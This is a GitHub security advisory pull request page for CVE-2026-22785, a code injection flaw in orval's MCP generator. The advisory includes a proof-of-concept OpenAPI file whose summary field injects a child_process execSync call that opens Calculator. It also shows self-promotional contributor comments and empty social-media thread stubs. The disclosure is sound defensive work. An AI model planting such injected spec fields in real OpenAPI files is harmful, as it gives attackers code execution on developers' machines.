[GHSA-mwr6-3gp8-9jmj] orval MCP client is vulnerable to a code injection attack. #6646
Conversation
|
Hi there @melloware! A community member has suggested an improvement to your security advisory. If approved, this change will affect the global advisory listed at github.com/advisories. It will not affect the version listed in your project repository. This change will be reviewed by our Security Curation Team. If you have thoughts or feedback, please share them in a comment here! If this PR has already been closed, you can start a new community contribution for this advisory |
github-actions
bot
changed the base branch from
main
to
asrar-mared/advisory-improvement-6646
|
🛡️ Confirmed: This patch and advisory enhancement were authored and technically validated by Zayed Security Research Team, led by the sovereign vulnerability hunter asrar-mared. This contribution is part of our ongoing mission to secure open-source ecosystems through deep analysis, real-world exploitation scenarios, and responsible disclosure. We don’t just find bugs — — 🎯 asrar-mared |
| { | ||
| "schema_version": "1.4.0", | ||
| "id": "GHSA-mwr6-3gp8-9jmj", | ||
| "modified": "2026-01-13T19:12:22Z", |
There was a problem hiding this comment.
"modified": "2026-01-13T19:12:23Z",
| "CVE-2026-22785" | ||
| ], | ||
| "summary": "orval MCP client is vulnerable to a code injection attack.", | ||
| "details": "### Impact\nThe MCP server generation logic relies on string manipulation that incorporates the summary field from the OpenAPI specification without proper validation or escaping. This allows an attacker to \"break out\" of the string literal and inject arbitrary code.\n\nHere is an example OpenAPI with the exploit\n\n```yaml\nopenapi: 3.0.4\ninfo:\n title: Swagger Petstore - OpenAPI 3.0\n description: |-\n This is a sample Pet Store Server based on the OpenAPI 3.0 specification. You can find out more about\n Swagger at [https://swagger.io](https://swagger.io). In the third iteration of the pet store, we've switched to the design first approach!\n You can now help us improve the API whether it's by making changes to the definition itself or to the code.\n That way, with time, we can improve the API in general, and expose some of the new features in OAS3.\n\n Some useful links:\n - [The Pet Store repository](https://github.com/swagger-api/swagger-petstore)\n - [The source API definition for the Pet Store](https://github.com/swagger-api/swagger-petstore/blob/master/src/main/resources/openapi.yaml)\n termsOfService: https://swagger.io/terms/\n contact:\n email: [email protected]\n license:\n name: Apache 2.0\n url: https://www.apache.org/licenses/LICENSE-2.0.html\n version: 1.0.27-SNAPSHOT\nexternalDocs:\n description: Find out more about Swagger\n url: https://swagger.io\nservers:\n - url: https://petstore3.swagger.io/api/v3\ntags:\n - name: pet\n description: Everything about your Pets\n externalDocs:\n description: Find out more\n url: https://swagger.io\n - name: store\n description: Access to Petstore orders\n externalDocs:\n description: Find out more about our store\n url: https://swagger.io\n - name: user\n description: Operations about user\npaths:\n /pet/findByStatus:\n get:\n tags:\n - pet\n summary: Finds Pets by status.' + require('child_process').execSync(\"open -a Calculator\").toString(),//\n description: Multiple status values can be provided with comma separated strings.\n operationId: findPetsByStatus\n parameters:\n - name: status\n in: query\n description: Status values that need to be considered for filter\n schema:\n type: string\n responses:\n '200':\n description: successful operation\n content:\n application/json:\n schema:\n type: string\n '400':\n description: Invalid status value\n default:\n description: Unexpected error\n security:\n - petstore_auth:\n - write:pets\n - read:pets\n ```\n \n\n### Patches\nThis is fixed in version 7.18.0 or higher\n\n### Workarounds\nDo check your generated OpenAPI yaml/json before running through Orval CLI and correct it if it has injection.", |
|
🛡️ Confirmed: This patch and advisory enhancement were authored and technically validated by Zayed Security Research Team, led by asrar-mared. |
melloware
left a comment
melloware
left a comment
There was a problem hiding this comment.
would prefer English only and a simple writeup
Updates
Comments
🧵 Twitter/LinkedIn Thread - CVE-2026-22785
Tweet 1/7 🔥
Tweet 2/7 🎯
Tweet 3/7 💣
Tweet 4/7 🛡️
Tweet 5/7 🔍
Tweet 6/7 🎓
Tweet 7/7 🏆
LinkedIn Post (نسخة احترافية) 💼
GitHub Issue Template 📝
Impact
Fix
Update to v7.18.0+
Timeline
Credits
Zayed Security Research Team
References
[CVE-2026-22785] Critical RCE in Orval MCP - OpenAPI Code Injection
TL;DR: Found a nasty code injection in @orval/mcp that lets you execute arbitrary code via poisoned OpenAPI specs. CVSS 9.8. Patched in v7.18.0.
The Bug:
The library takes the "summary" field from OpenAPI and directly embeds it into generated JavaScript without sanitization. Classic injection.
Why It Matters:
PoC:
Check out the full technical writeup [link]
Disclosure:
Responsibly disclosed. Patch available. Update NOW.
Stay curious, stay secure 🛡️